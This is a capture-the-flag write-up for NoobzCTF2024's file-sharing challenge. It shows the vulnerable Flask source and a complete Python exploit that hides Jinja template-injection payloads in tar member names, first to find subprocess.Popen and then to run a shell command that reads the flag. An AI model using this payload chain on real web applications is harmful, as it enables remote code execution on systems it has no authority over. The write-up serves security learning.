NoobzCTF2024 | File Sharing Portal

Introduction#

The ctf has a very simple structure: we have a form in which we are asked to insert a tar file; once the tar file has been inserted, it is unzipped and we are shown the name of files it contains; by clicking on the different files, we can read their contents.

Source#

The source has comments added later to allow a better understanding of the code in the writeups

1
#!/usr/bin/env python3
2
from flask import Flask, request, redirect, render_template, render_template_string
3
import tarfile
4
from hashlib import sha256
5
import os
6
app = Flask(__name__)
7

8
@app.route('/',methods=['GET','POST'])
9
def main():
10
    # This function mainly deals with loading the tar file into the server's file system.
11
    global username
12
    if request.method == 'GET':
13
        return render_template('index.html')
14
    elif request.method == 'POST':
15
        file = request.files['file']
16
        if file.filename[-4:] != '.tar': # Check that the file passed is actually a tar file
17
            return render_template_string("<p> We only support tar files as of right now!</p>") # Otherwise, it renders an error message
18
        name = sha256(os.urandom(16)).digest().hex() # Creates a random name that it will use to name our tar and the folder in the server's file system
19
        os.makedirs(f"./uploads/{name}", exist_ok=True) # Create the directory
20
        file.save(f"./uploads/{name}/{name}.tar") # Save the tar file
21
        try:
22
            # Extract the tar file
23
            tar_file = tarfile.TarFile(f'./uploads/{name}/{name}.tar')
24
            tar_file.extractall(path=f'./uploads/{name}/')
25
            return render_template_string(f"<p>Tar file extracted! View <a href='/view/{name}'>here</a>")
26
        except:
27
            return render_template_string("<p>Failed to extract file!</p>")
28

29
@app.route('/view/<name>')
30
def view(name):
31
    # This function displays the files contained in the .tar file
32
    if not all([i in "abcdef1234567890" for i in name]): # Check that the file name is in hexadecimal, to avoid any kind of malicious input
33
        return render_template_string("<p>Error!</p>")
34
        #print(os.popen(f'ls ./uploads/{name}').read())
35
            #print(name)
36
    files = os.listdir(f"./uploads/{name}") # List all files in the previously created folder
37
    out = '<h1>Files</h1><br>'
38
    files.remove(f'{name}.tar')  # Remove the tar file from the list
39
    for i in files:
40
        out += f'<a href="/read/{name}/{i}">{i}</a>' # Show via templates all file names
41
       # except:
42
    return render_template_string(out) # Render the template with the render_template_string function
43

44
@app.route('/read/<name>/<file>')
45
def read(name,file):
46
    # The function shows the contents of the single file
47
    if (not all([i in "abcdef1234567890" for i in name])): # Check that the file name is in hexadecimal, to avoid any kind of malicious input
48
        return render_template_string("<p>Error!</p>")
49
    if ((".." in name) or (".." in file)) or (("/" in file) or "/" in name):  # Other controls to avoid path er
50
        return render_template_string("<p>Error!</p>")
51
    f = open(f'./uploads/{name}/{file}') # Open the file
52
    data = f.read()
53
    f.close()
54
    return data # Return the content of file
55

56
if __name__ == '__main__':
57
    app.run(host='0.0.0.0', port=1337)

We can therefore see that there are several parameter checks, and at first one might think that the code is 100% safe.

Solution#

The first thing that came to mind was to create a symbolic link to access the flag, and indeed this works (try with server.py), the problem is that the filename of the flag is unknown and this does not allow us to create a valid symbolic link.

Once we realised this, we did a thorough analysis of the code and came to the conclusion that the only thing that was not being checked was the name of the unpacked tar file allowing us to insert anything. By combining this with the ‘render_template_string’ function (a vulnerable function of flask), it is possible to perform a template injection.

1
import requests
2
import os
3
import tarfile
4
from bs4 import BeautifulSoup
5

6
url = 'http://redacted.challs.n00bzunit3d.xyz:8080/'
7

8

9
def create_tar(tar_name, file):
10
    with tarfile.open(tar_name, 'w') as tar:
11
        tar.add(file, arcname=os.path.basename(file))
12
    print(f'Tar file created: {tar_name}')
13

14

15
def create_payload(payload):
16
    with open(payload, 'w') as f:
17
        f.write('Remember to byte the cookies')
18

19
    create_tar('exploit.tar', payload)
20
    print(f'Payload created: {payload}')
21

22

23
def get_url_view(text):
24
    soup = BeautifulSoup(text, 'html5lib')
25
    return [a['href'] for a in soup.find_all('a', href=True)][0]
26

27

28
def leak_subprocess_index():
29
    payload = "{{int.__class__.__base__.__subclasses__()}}"
30
    create_payload(payload)
31

32
    r = requests.post(url, files={'file': open('exploit.tar', 'rb')})
33

34
    url_file = get_url_view(r.text)
35
    r = requests.get(url + url_file)
36
    text = r.text[r.text.index('[')+1:]
37

38
    list_classes = text.split(',')
39

40
    for i, c in enumerate(list_classes):
41
        if 'subprocess.Popen' in c:
42
            print(f'Index subprocess.Popen: {i}')
43
            return str(i)
44

45

46
def get_flag(index):
47
    payload = "{{int.__class__.__base__.__subclasses__()[" + \
48
        index + "]('cat *', shell=True, stdout=-1).communicate()}}"
49
    create_payload(payload)
50

51
    r = requests.post(url, files={'file': open('exploit.tar', 'rb')})
52

53
    url_file = get_url_view(r.text)
54
    r = requests.get(url + url_file)
55

56
    flag = r.text[r.text.index('n00bz{'):r.text.index('}')+1]
57
    print(f'Flag: {flag}')
58

59

60
def main():
61
    subprocess_index = leak_subprocess_index()
62
    get_flag(subprocess_index)
63

64

65
if __name__ == '__main__':
66
    main()

flag: n00bz{n3v3r_7rus71ng_t4r_4g41n!_b3506983087e}